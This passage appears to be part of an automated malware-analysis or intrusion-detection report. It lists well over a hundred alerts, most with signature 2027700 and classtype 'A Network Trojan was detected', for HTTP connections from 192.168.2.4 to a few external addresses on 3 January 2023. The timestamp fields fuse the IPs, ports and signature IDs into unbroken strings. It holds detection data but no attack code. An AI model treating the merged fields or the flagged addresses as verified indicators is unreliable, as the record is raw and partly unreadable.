                                Source Port:50277
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350752802027700 01/05/23-09:01:01.248601
                                SID:2027700
                                Source Port:50752
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350568802027700 01/05/23-09:00:42.097830
                                SID:2027700
                                Source Port:50568
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950766802027700 01/05/23-09:01:02.615563
                                SID:2027700
                                Source Port:50766
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350233802027700 01/05/23-09:00:04.345204
                                SID:2027700
                                Source Port:50233
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950553802027700 01/05/23-09:00:40.950059
                                SID:2027700
                                Source Port:50553
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350729802027700 01/05/23-09:00:59.234035
                                SID:2027700
                                Source Port:50729
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350355802027700 01/05/23-09:00:19.100238
                                SID:2027700
                                Source Port:50355
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350272802027700 01/05/23-09:00:08.028845
                                SID:2027700
                                Source Port:50272
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350563802027700 01/05/23-09:00:41.874777
                                SID:2027700
                                Source Port:50563
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350211802027700 01/05/23-09:00:02.122665
                                SID:2027700
                                Source Port:50211
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350367802027700 01/05/23-09:00:20.661129
                                SID:2027700
                                Source Port:50367
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949863802027700 01/05/23-08:59:07.164841
                                SID:2027700
                                Source Port:49863
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350065802027700 01/05/23-08:59:46.088129
                                SID:2027700
                                Source Port:50065
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350052802027700 01/05/23-08:59:43.585697
                                SID:2027700
                                Source Port:50052
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950253802027700 01/05/23-09:00:06.154236
                                SID:2027700
                                Source Port:50253
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950721802027700 01/05/23-09:00:58.550789
                                SID:2027700
                                Source Port:50721
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350535802027700 01/05/23-09:00:39.324967
                                SID:2027700
                                Source Port:50535
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350619802027700 01/05/23-09:00:46.879341
                                SID:2027700
                                Source Port:50619
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350395802027700 01/05/23-09:00:23.481753
                                SID:2027700
                                Source Port:50395
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350815802027700 01/05/23-09:01:06.752289
                                SID:2027700
                                Source Port:50815
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950454802027700 01/05/23-09:00:29.567529
                                SID:2027700
                                Source Port:50454
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350266802027700 01/05/23-09:00:07.574734
                                SID:2027700
                                Source Port:50266
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950094802027700 01/05/23-08:59:49.425215
                                SID:2027700
                                Source Port:50094
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350138802027700 01/05/23-08:59:53.884041
                                SID:2027700
                                Source Port:50138
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950622802027700 01/05/23-09:00:47.066181
                                SID:2027700
                                Source Port:50622
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950295802027700 01/05/23-09:00:10.323715
                                SID:2027700
                                Source Port:50295
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350625802027700 01/05/23-09:00:47.337209
                                SID:2027700
                                Source Port:50625
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350690802027700 01/05/23-09:00:55.668022
                                SID:2027700
                                Source Port:50690
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350247802027700 01/05/23-09:00:05.746777
                                SID:2027700
                                Source Port:50247
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950639802027700 01/05/23-09:00:48.724908
                                SID:2027700
                                Source Port:50639
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350494802027700 01/05/23-09:00:35.553568
                                SID:2027700
                                Source Port:50494
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350691802027700 01/05/23-09:00:55.942061
                                SID:2027700
                                Source Port:50691
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950438802027700 01/05/23-09:00:27.630649
                                SID:2027700
                                Source Port:50438
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350681802027700 01/05/23-09:00:54.647884
                                SID:2027700
                                Source Port:50681
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950692802027700 01/05/23-09:00:55.836474
                                SID:2027700
                                Source Port:50692
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950168802027700 01/05/23-08:59:58.037942
                                SID:2027700
                                Source Port:50168
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350209802027700 01/05/23-09:00:01.920404
                                SID:2027700
                                Source Port:50209
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350745802027700 01/05/23-09:01:00.501319
                                SID:2027700
                                Source Port:50745
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350415802027700 01/05/23-09:00:25.451863
                                SID:2027700
                                Source Port:50415
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350110802027700 01/05/23-08:59:51.025266
                                SID:2027700
                                Source Port:50110
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950324802027700 01/05/23-09:00:13.873305
                                SID:2027700
                                Source Port:50324
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950380802027700 01/05/23-09:00:22.279876
                                SID:2027700
                                Source Port:50380
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350758802027700 01/05/23-09:01:02.001255
                                SID:2027700
                                Source Port:50758
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949835802027700 01/05/23-08:59:00.200398
                                SID:2027700
                                Source Port:49835
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349986802027700 01/05/23-08:59:29.463092
                                SID:2027700
                                Source Port:49986
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350265802027700 01/05/23-09:00:07.405430
                                SID:2027700
                                Source Port:50265
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350672802027700 01/05/23-09:00:53.850929
                                SID:2027700
                                Source Port:50672
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949752802027700 01/05/23-08:58:37.213644
                                SID:2027700
                                Source Port:49752
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949780802027700 01/05/23-08:58:48.899837
                                SID:2027700
                                Source Port:49780
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350634802027700 01/05/23-09:00:48.211624
                                SID:2027700
                                Source Port:50634
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350764802027700 01/05/23-09:01:02.361496
                                SID:2027700
                                Source Port:50764
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950085802027700 01/05/23-08:59:48.417766
                                SID:2027700
                                Source Port:50085
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350284802027700 01/05/23-09:00:09.116701
                                SID:2027700
                                Source Port:50284
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350154802027700 01/05/23-08:59:55.353881
                                SID:2027700
                                Source Port:50154
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950435802027700 01/05/23-09:00:27.331565
                                SID:2027700
                                Source Port:50435
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950352802027700 01/05/23-09:00:18.853923
                                SID:2027700
                                Source Port:50352
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350717802027700 01/05/23-09:00:57.953893
                                SID:2027700
                                Source Port:50717
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950695802027700 01/05/23-09:00:56.139451
                                SID:2027700
                                Source Port:50695
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950026802027700 01/05/23-08:59:36.189241
                                SID:2027700
                                Source Port:50026
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950378802027700 01/05/23-09:00:22.015733
                                SID:2027700
                                Source Port:50378
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949759802027700 01/05/23-08:58:38.842133
                                SID:2027700
                                Source Port:49759
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950283802027700 01/05/23-09:00:09.140730
                                SID:2027700
                                Source Port:50283
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950087802027700 01/05/23-08:59:48.754488
                                SID:2027700
                                Source Port:50087
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350107802027700 01/05/23-08:59:50.632374
                                SID:2027700
                                Source Port:50107
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950461802027700 01/05/23-09:00:30.444227
                                SID:2027700
                                Source Port:50461
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350677802027700 01/05/23-09:00:54.350828
                                SID:2027700
                                Source Port:50677
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949998802027700 01/05/23-08:59:31.372183
                                SID:2027700
                                Source Port:49998
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350027802027700 01/05/23-08:59:37.414842
                                SID:2027700
                                Source Port:50027
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949860802027700 01/05/23-08:59:06.797494
                                SID:2027700
                                Source Port:49860
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349923802027700 01/05/23-08:59:15.228371
                                SID:2027700
                                Source Port:49923
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350073802027700 01/05/23-08:59:46.797360
                                SID:2027700
                                Source Port:50073
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350379802027700 01/05/23-09:00:22.115548
                                SID:2027700
                                Source Port:50379
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350771802027700 01/05/23-09:01:02.920270
                                SID:2027700
                                Source Port:50771
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350045802027700 01/05/23-08:59:43.021741
                                SID:2027700
                                Source Port:50045
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350251802027700 01/05/23-09:00:06.064860
                                SID:2027700
                                Source Port:50251
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950433802027700 01/05/23-09:00:27.032752
                                SID:2027700
                                Source Port:50433
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349984802027700 01/05/23-08:59:29.123303
                                SID:2027700
                                Source Port:49984
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950255802027700 01/05/23-09:00:06.468696
                                SID:2027700
                                Source Port:50255
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350392802027700 01/05/23-09:00:23.288275
                                SID:2027700
                                Source Port:50392
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350040802027700 01/05/23-08:59:41.869933
                                SID:2027700
                                Source Port:50040
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.159.1849987802851115 01/05/23-08:59:29.990043
                                SID:2851115
                                Source Port:49987
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Attempted Administrator Privilege Gain
                                Timestamp:192.168.2.445.66.230.12350688802027700 01/05/23-09:00:55.451575
                                SID:2027700
                                Source Port:50688
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350336802027700 01/05/23-09:00:16.869738
                                SID:2027700
                                Source Port:50336
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950232802027700 01/05/23-09:00:04.235940
                                SID:2027700
                                Source Port:50232
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350554802027700 01/05/23-09:00:41.088042
                                SID:2027700
                                Source Port:50554
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.4200.46.66.7150015802851815 01/05/23-08:59:34.306720
                                SID:2851815
                                Source Port:50015
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950662802027700 01/05/23-09:00:52.966787
                                SID:2027700
                                Source Port:50662
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950757802027700 01/05/23-09:01:01.880943
                                SID:2027700
                                Source Port:50757
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350369802027700 01/05/23-09:00:20.866024
                                SID:2027700
                                Source Port:50369
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350626802027700 01/05/23-09:00:47.433838
                                SID:2027700
                                Source Port:50626
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949832802027700 01/05/23-08:58:58.603516
                                SID:2027700
                                Source Port:49832
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950160802027700 01/05/23-08:59:57.457133
                                SID:2027700
                                Source Port:50160
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950288802027700 01/05/23-09:00:09.468554
                                SID:2027700
                                Source Port:50288
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950069802027700 01/05/23-08:59:46.420495
                                SID:2027700
                                Source Port:50069
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950082802027700 01/05/23-08:59:48.081991
                                SID:2027700
                                Source Port:50082
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350761802027700 01/05/23-09:01:02.150426
                                SID:2027700
                                Source Port:50761
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950260802027700 01/05/23-09:00:07.014361
                                SID:2027700
                                Source Port:50260
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949819802027700 01/05/23-08:58:55.037438
                                SID:2027700
                                Source Port:49819
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950064802027700 01/05/23-08:59:45.584606
                                SID:2027700
                                Source Port:50064
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350364802027700 01/05/23-09:00:20.229662
                                SID:2027700
                                Source Port:50364
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350145802027700 01/05/23-08:59:54.297296
                                SID:2027700
                                Source Port:50145
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950631802027700 01/05/23-09:00:47.877884
                                SID:2027700
                                Source Port:50631
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350598802027700 01/05/23-09:00:44.565880
                                SID:2027700
                                Source Port:50598
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350442802027700 01/05/23-09:00:27.991688
                                SID:2027700
                                Source Port:50442
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949837802027700 01/05/23-08:59:01.164961
                                SID:2027700
                                Source Port:49837
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350682802027700 01/05/23-09:00:54.925031
                                SID:2027700
                                Source Port:50682
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350733802027700 01/05/23-09:00:59.735470
                                SID:2027700
                                Source Port:50733
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350807802027700 01/05/23-09:01:05.892247
                                SID:2027700
                                Source Port:50807
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950680802027700 01/05/23-09:00:54.534639
                                SID:2027700
                                Source Port:50680
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950132802027700 01/05/23-08:59:53.254371
                                SID:2027700
                                Source Port:50132
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350274802027700 01/05/23-09:00:08.240684
                                SID:2027700
                                Source Port:50274
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950606802027700 01/05/23-09:00:45.465505
                                SID:2027700
                                Source Port:50606
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350183802027700 01/05/23-08:59:59.313846
                                SID:2027700
                                Source Port:50183
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950603802027700 01/05/23-09:00:45.162245
                                SID:2027700
                                Source Port:50603
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949770802027700 01/05/23-08:58:45.266341
                                SID:2027700
                                Source Port:49770
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949847802027700 01/05/23-08:59:04.128946
                                SID:2027700
                                Source Port:49847
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350196802027700 01/05/23-09:00:00.463904
                                SID:2027700
                                Source Port:50196
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949870802027700 01/05/23-08:59:08.531190
                                SID:2027700
                                Source Port:49870
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350687802027700 01/05/23-09:00:55.430298
                                SID:2027700
                                Source Port:50687
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949769802027700 01/05/23-08:58:44.873665
                                SID:2027700
                                Source Port:49769
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350374802027700 01/05/23-09:00:21.383981
                                SID:2027700
                                Source Port:50374
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950310802027700 01/05/23-09:00:11.683603
                                SID:2027700
                                Source Port:50310
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950097802027700 01/05/23-08:59:49.704779
                                SID:2027700
                                Source Port:50097
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349974802027700 01/05/23-08:59:27.799434
                                SID:2027700
                                Source Port:49974
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350593802027700 01/05/23-09:00:44.123045
                                SID:2027700
                                Source Port:50593
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350516802027700 01/05/23-09:00:37.594832
                                SID:2027700
                                Source Port:50516
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350220802027700 01/05/23-09:00:03.013302
                                SID:2027700
                                Source Port:50220
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.4211.40.39.25149980802851815 01/05/23-08:59:28.909642
                                SID:2851815
                                Source Port:49980
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350776802027700 01/05/23-09:01:03.330542
                                SID:2027700
                                Source Port:50776
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349861802027700 01/05/23-08:59:06.798813
                                SID:2027700
                                Source Port:49861
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949875802027700 01/05/23-08:59:08.935997
                                SID:2027700
                                Source Port:49875
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950204802027700 01/05/23-09:00:01.361188
                                SID:2027700
                                Source Port:50204
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350750802027700 01/05/23-09:01:00.979250
                                SID:2027700
                                Source Port:50750
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350083802027700 01/05/23-08:59:48.320016
                                SID:2027700
                                Source Port:50083
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350076802027700 01/05/23-08:59:47.347998
                                SID:2027700
                                Source Port:50076
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350178802027700 01/05/23-08:59:58.809811
                                SID:2027700
                                Source Port:50178
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950329802027700 01/05/23-09:00:16.071197
                                SID:2027700
                                Source Port:50329
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350328802027700 01/05/23-09:00:16.076424
                                SID:2027700
                                Source Port:50328
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350315802027700 01/05/23-09:00:12.211643
                                SID:2027700
                                Source Port:50315
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350257802027700 01/05/23-09:00:06.668354
                                SID:2027700
                                Source Port:50257
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350722802027700 01/05/23-09:00:58.572601
                                SID:2027700
                                Source Port:50722
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349925802027700 01/05/23-08:59:15.658086
                                SID:2027700
                                Source Port:49925
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349981802027700 01/05/23-08:59:28.854811
                                SID:2027700
                                Source Port:49981
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950258802027700 01/05/23-09:00:06.751514
                                SID:2027700
                                Source Port:50258
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350779802027700 01/05/23-09:01:03.739143
                                SID:2027700
                                Source Port:50779
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950290802027700 01/05/23-09:00:09.751789
                                SID:2027700
                                Source Port:50290
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350371802027700 01/05/23-09:00:21.155986
                                SID:2027700
                                Source Port:50371
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949896802027700 01/05/23-08:59:11.826037
                                SID:2027700
                                Source Port:49896
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350499802027700 01/05/23-09:00:36.209598
                                SID:2027700
                                Source Port:50499
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350188802027700 01/05/23-08:59:59.839642
